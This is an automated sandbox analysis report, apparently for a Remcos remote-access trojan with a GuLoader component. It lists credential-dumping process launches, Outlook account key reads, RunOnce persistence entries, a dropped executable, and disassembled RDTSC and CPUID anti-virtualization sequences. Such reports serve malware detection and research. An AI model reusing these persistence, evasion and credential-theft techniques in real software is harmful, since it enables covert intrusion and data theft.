      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00416D7222_2_00416D72
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00446D3022_2_00446D30
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00446D8B22_2_00446D8B
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00406E8F22_2_00406E8F
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_1_0047634722_1_00476347
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004050C223_2_004050C2
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004014AB23_2_004014AB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040513323_2_00405133
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004051A423_2_004051A4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040124623_2_00401246
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040CA4623_2_0040CA46
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040523523_2_00405235
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004032C823_2_004032C8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004222D923_2_004222D9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040168923_2_00401689
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402F6023_2_00402F60
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_1_004222D923_1_004222D9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0040D04424_2_0040D044
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0040503824_2_00405038
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004050A924_2_004050A9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0040511A24_2_0040511A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004051AB24_2_004051AB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004382F324_2_004382F3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0043057524_2_00430575
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0043B67124_2_0043B671
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0041F6CD24_2_0041F6CD
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004119CF24_2_004119CF
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00439B1124_2_00439B11
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00438E5424_2_00438E54
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00412F6724_2_00412F67
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0043CF1824_2_0043CF18
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_1_0045530B24_1_0045530B
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004169A7 appears 87 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044DB70 appears 41 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 004165FF appears 35 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00412968 appears 78 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00421A32 appears 43 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 00416760 appears 69 times
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: String function: 0044407A appears 37 times
      Source: loKmeabs9V.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: yourphone.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: loKmeabs9V.exe, 00000000.00000000.205287548.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000003.473704439.000000001E84B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000000.334706774.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 0000000E.00000002.1292980091.000000001DEA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFileName vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000016.00000000.466532006.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilename vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000017.00000000.468896528.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exe, 00000018.00000000.470164942.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeBinary or memory string: OriginalFilenameTROSSKIFTERNES.exe vs loKmeabs9V.exe
      Source: loKmeabs9V.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,22_2_004182CE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,23_2_00410DE1
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,22_2_00418758
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,22_2_00413D4C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,22_2_0040B58D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2A65A40B0FC83CF5.TMPJump to behavior
      Source: loKmeabs9V.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSystem information queried: HandleInformationJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: loKmeabs9V.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
      Source: loKmeabs9V.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: loKmeabs9V.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: loKmeabs9V.exeVirustotal: Detection: 20%
      Source: loKmeabs9V.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile read: C:\Users\user\Desktop\loKmeabs9V.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe' Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\Desktop\loKmeabs9V.cfgJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 22.2.loKmeabs9V.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 23.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Source: C:\Users\user\Desktop\loKmeabs9V.exeUnpacked PE file: 24.2.loKmeabs9V.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,22_2_004044A4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_00404DCC push edx; iretd 0_2_00404DD6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_004059BD push F32E5D69h; retf 0_2_004059D0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044693D push ecx; ret 22_2_0044694D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044DB70 push eax; ret 22_2_0044DB84
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044DB70 push eax; ret 22_2_0044DBAC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00451D54 push eax; ret 22_2_00451D61
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414060 push eax; ret 23_2_00414074
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414060 push eax; ret 23_2_0041409C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00414039 push ecx; ret 23_2_00414049
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004164EB push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00416553 push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00416555 push 0000006Ah; retf 23_2_004165C4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00444355 push ecx; ret 24_2_00444365
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004446D0 push eax; ret 24_2_004446E4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004446D0 push eax; ret 24_2_0044470C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0044AC84 push eax; ret 24_2_0044AC91
      Source: initial sampleStatic PE information: section name: .text entropy: 7.07623900315
      Source: initial sampleStatic PE information: section name: .text entropy: 7.07623900315
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeJump to dropped file

      Boot Survival:

      barindex
      Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,24_2_004047C6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0BC7 TerminateProcess,0_2_022B0BC7
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C3 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8923 0_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5DAE 0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 NtWriteVirtualMemory,0_2_022B87E3
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\YOURPHONE.EXE\SUBFOLDER1SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCESTARTUP KEY
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B7F30 second address: 00000000022B7F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B7F7B second address: 00000000022B7F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88DF second address: 00000000022B88F0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub byte ptr [eax], 00000016h 0x0000000d pushad 0x0000000e lfence 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B88F0 second address: 00000000022B8A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4A957D9h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4A9693Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B62EB second address: 00000000022B62EB instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B73B0 second address: 00000000022B73B0 instructions:
